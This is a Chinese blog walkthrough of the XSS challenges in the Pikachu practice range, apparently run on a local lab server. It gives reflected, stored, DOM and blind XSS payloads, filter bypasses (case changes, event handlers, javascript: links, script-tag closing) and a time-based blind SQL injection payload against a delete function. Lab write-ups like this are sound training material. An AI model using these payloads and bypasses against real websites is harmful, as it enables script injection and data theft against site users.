Pikachu靶场通关之XSS(跨站脚本)

最新推荐文章于 2024-06-17 14:41:46 发布
最新推荐文章于 2024-06-17 14:41:46 发布
阅读量605 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441315/article/details/119808187
版权

Pikachu靶场通关之XSS

反射型xss(get)

输入xss代码,发现长度不够,审查元素修改下长度,输入payload

<script>alert()</script>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
提交后,发现触发了xss

查看后台代码,发现 后台代码并没有对你输入的东西 做任何修改 ,只是原封不动的输出了
在这里插入图片描述

反射性xss(post)

在这里插入图片描述

输入账号密码:admin/123456 登入
在这里插入图片描述
输入payload:

<script>alert()</script>

发现没有反应,弹出窗口,成功
在这里插入图片描述
查看后台代码,发现 后台代码并没有对你输入的东西 做任何修改 ,只是原封不动的输出了
在这里插入图片描述

存储型xss

在这里插入图片描述

我们随便输入一个字符串,发现会在留言表进行显示
在这里插入图片描述
那么我们尝试输入下payload

<script>alert()</script>

输入后,发现出现弹窗,再次进去还是会出现弹窗
在这里插入图片描述
审查元素发现,xss已经永久在网页里了
在这里插入图片描述
查看后台代码,发现当我们留言后,判断message是否存在,并且 message不为空
进行了转义,防止sql注入插数据库的时候,把massage 插入到表中存下来,存到后台
在这里插入图片描述
将存储的留言 都显示出来
在这里插入图片描述
彩蛋:
发现删除功能有sql注入的可能
点击删除尝试抓包改变id

GET /xscj/pikachu-master/vul/xss/xss_stored.php?id=56 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://127.0.0.1/xscj/pikachu-master/vul/xss/xss_stored.php
Cookie: PHPSESSID=bg229f1cuph7de6mef662p1446
Connection: close

无回显和报错,可以尝试延时注入
payload:
延时注入

select if(length(database())=7,sleep(100),1)

在这里插入图片描述

DOM型xss

HTML DOM树,可以理解为DOM为一个一个访问html的标准编程接口
htmldom
在这里插入图片描述
输入测试代码’"<> 显示的内容和我们的输入的有所不同
审查元素发现getElementById获取标签id为text的值传递给str,str通过字符串拼接到a标签中。所以我们要闭合前面的标签
在这里插入图片描述
在这里插入图片描述

<a href='"+str+"'>what do you see?</a>
<div id="dom"></div>

payload:

' onclick="alert()">

分析将payload拼接到str中dom会得到

<a href='' onclick="alert('xss')">'>what do you see?</a>

可以得出链接名变成了’>what do you see?,而href变成了οnclick=“alert(‘xss’)”

在这里插入图片描述

'><img src="#" οnmοuseοver="alert('xss')">

分析将payload拼接到str中dom会得到

<a href=''><img src="#" onmouseover="alert('xss')">'>what do you see?</a>

可是变成了一个图片链接,鼠标一离开图片就会触发
在这里插入图片描述

DOM型xss-x

payload与上面一样

xss之盲打

xss盲打是一种攻击场景。我们输出的payload不会在前端进行输出,当管理员查看时就会遭到xss攻击。
输入常规的payload:<script>alert()</script>,点击提交后发现这里提示一段文字,应该是直接打到后台了,找到后台,登录进去看看
在这里插入图片描述
后台地址是/xssblind/admin_login.php登录即可触发xss
在这里插入图片描述

xss之过滤

输入<script>alert()</script>发现都被过滤了
在这里插入图片描述
我们尝试下大写绕过

<Script>alert()</Script>

成功!!!
当script进行了小写操作成为滤关键词时,可以尝试其他的payload,如

<img src=x onmouseover="alert()">
<img src=x onerror="alert()">

xss之htmlspecialchars

htmlspecialchars没有对 ’ 进行实体转码
我们可以构造payload

' οnclick='alert()'>

绕过即可

xss之href输出

尝试使用payload

' οnclick='alert()'>

发现不行
查看源代码只htmlspecialchars还对单引号进行了实体编码,所以单引号不行了

 $message=htmlspecialchars($_GET['message'],ENT_QUOTES);

但可以在a标签的href属性里面使用javascript协议来执行js,可以尝试使用伪协议绕过
javascript:alert()
在这里插入图片描述
点击即可触发弹窗

xss之js输出

输入测试代码查看源码
输入的代码被生成在js中并赋值给$ms。我们的输入被带入到js中,可以闭合

</script><script>alert()</script>

在这里插入图片描述
成功弹窗

硫酸超
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反射型XSS漏洞基础
Ethan024的博客
03-11 300
XSS漏洞基础(本文仅供技术学习与分享) 反射型XSS(GET)漏洞弹窗 实验准备: 皮卡丘靶场 实验步骤: 2. 确认页面是否存在XSS漏洞;在对应的输入输入危险字符,包括’, ", <, >以及危险字符串等; 3. 确认输入后是否会被过滤,输出是否会被处理; 4. 这里输入<>后,发现输入的字符串未被过滤或转义: 5. 查看源码发现,发现我们输入的<>被输出在标签里面: 6. 因此我们可以推测,如果输入JavaScript代码,也不会被过滤。因此输入简单的
pikachu靶场之Cross-Site Scripting(XSS
Christma1s的博客
03-06 527
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; ...
pikachuXSS(初学者总结)
av11566的博客
05-09 1293
目录 1.反射型XSS(get) 2.反射型XSS(post) 3.存储型xss DOM型XSS DOM型xss-x xss之盲打 XSS之过滤 xss之htmlspecialchars XSS之href XSS-js输出 1.反射型XSS(get) 获取cookie '><script>alert(document.cookie)</script> 根据提示先输入一个kobe试试,输入框有长度限制先改个大的(多长的脚本也不怕了) ..
Pikachu靶场--XSS
最新发布
qq_65150735的博客
06-17 1136
Pikachu靶场--XSS跨站脚本
Pikachu靶场全级别通关教程详解
热门推荐
weixin_52385170的博客
12-02 4万+
Pikachu靶场通关教程,超详细,欢迎评论区留言,一起进步
pikachu靶场xss通关教程)
记录学习
05-11 1477
pikachu靶场通关xss
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场通关
11-19
pikachu靶场通关
pikachu靶场环境
02-12
在"Pikachu靶场"中,用户通常会遇到各种网络安全挑战,包括但不限于Web应用漏洞挖掘(如SQL注入、XSS跨站脚本攻击、文件包含漏洞等)、网络服务漏洞利用(如FTP、SMTP、SSH等服务的漏洞)、密码学概念应用(如加密与...
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
xss、脏牛提权.zip
06-18
包含xss注入闯关小游戏和脏牛提权exp等干货
pikachu通关教程(XSS
Bu2n的博客
12-07 1405
存储型xss_安全测试之XSS
weixin_39989159的博客
11-29 1607
安全测试之跨站脚本攻击(XSS)前言随着互联网的不断发展,web应用的互动性也越来越强。但正如一个硬币会有两面一样,在用户体验提升的同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见的一种攻击方式:XSS攻击。(一)什么是XSS攻击先上一段标准解释(摘自百度百科)。“XSS跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style ...
XSS-存储型
qq_39416206的博客
03-14 450
一、知识点 同源策略: 所谓同源:需要同 域名/host、端口、协议 存储型xss是什么 提交恶意xss数据,存入数据库中,访问时触发。 存储型xss可能出现的位置 可以插入数据的地方,比如用户注册,留言板,上传文件的文件名处,管理员可见的报错信息 获取到别人的Cookie怎么登陆别人用户 可以使用Burp抓包直接修改抓包数据,也可以使用浏览器修改Cookie,建议火狐浏览器 存储型XSS怎么预防? XSS预防从两点出发,第一点不允许输入恶意字符,第二点不允许输出,都.
pikachuxss靶场详细通关教程
qq_49502930的博客
11-18 8592
发的 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表
存储型xss_WEB安全之XSS(1)
weixin_39653448的博客
12-05 817
大家好,我是阿里斯,一名IT行业小白。由于工作原因停更已经好久,中间虽然也水了俩篇文章,但是个人感觉该继续水下去了,因为收到了不止一位粉丝的监督。那么就从今天开始吧,接下来的主要内容主要围绕xss展开。什么是同源策略同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。所以xyz.com下的js脚本采用javascript读取abc.com里面的文件...
皮卡丘(pikachu) XSS三种类型举例
weixin_44787832的博客
07-22 3471
反射型xss(get) 首先输入 >'''<> 并提交,发现可以正常输出 查看源码 发现我们的输入全部输出到了p标签中 之后我们输入payload: <script>alert("xss")</script> 发现输入框中容不下这么长的数据 之后我们F12,去改maxlength的值 改完后我们的payload执行成功 查看源码,JS代码被浏览器执行 像这种GET型的XSS漏洞,一般可将含XSS的URL伪.
xss漏洞知识总结
ma963852的博客
04-14 5638
漏洞原理 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 未对用户的输入进行处理,浏览器将用户输入的内容当作脚本执行。恶意攻击者往Web页面里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码会被执行,从而达到恶意的特殊目的。是一种针对用户浏览器的攻击。 漏洞分类 Xss主要分为三种类型: (1)反射型 反射型xss又称非持久性xss,需要用户点击带有
pikachu靶场xss漏洞通关
08-10
你好!要通关Pikachu靶场XSS漏洞,你可以按照以下步骤进行操作: 1. 首先,了解XSS漏洞的原理和类型。XSS跨站脚本攻击)是一种常见的Web漏洞,攻击者通过在网页中注入恶意脚本,利用用户的浏览器执行恶意代码,从而获取用户的敏感信息或进行其他恶意操作。 2. 进入Pikachu靶场XSS关卡。你可以在Pikachu靶场网站上找到XSS关卡,并点击进入。 3. 分析目标网页的源代码。查看目标网页的源代码,找到用户输入的地方,这些地方可能存在漏洞。 4. 尝试注入恶意脚本。在目标输入框或其他用户可输入的地方,尝试注入一些简单的恶意脚本,例如 `<script>alert('XSS')</script>`。如果成功弹出一个对话框,说明存在XSS漏洞。 5. 利用XSS漏洞进行更高级的攻击。一旦确认存在XSS漏洞,你可以尝试利用它进行更高级的攻击,例如窃取用户的Cookie信息、进行钓鱼攻击等。这需要根据具体情况来进行进一步的研究和尝试。 请注意,在进行任何形式的安全测试时,确保遵守法律和道德准则,并且只在合法授权的范围内进行。希望这些信息对你有所帮助!如果你有任何其他问题,可以继续向我提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值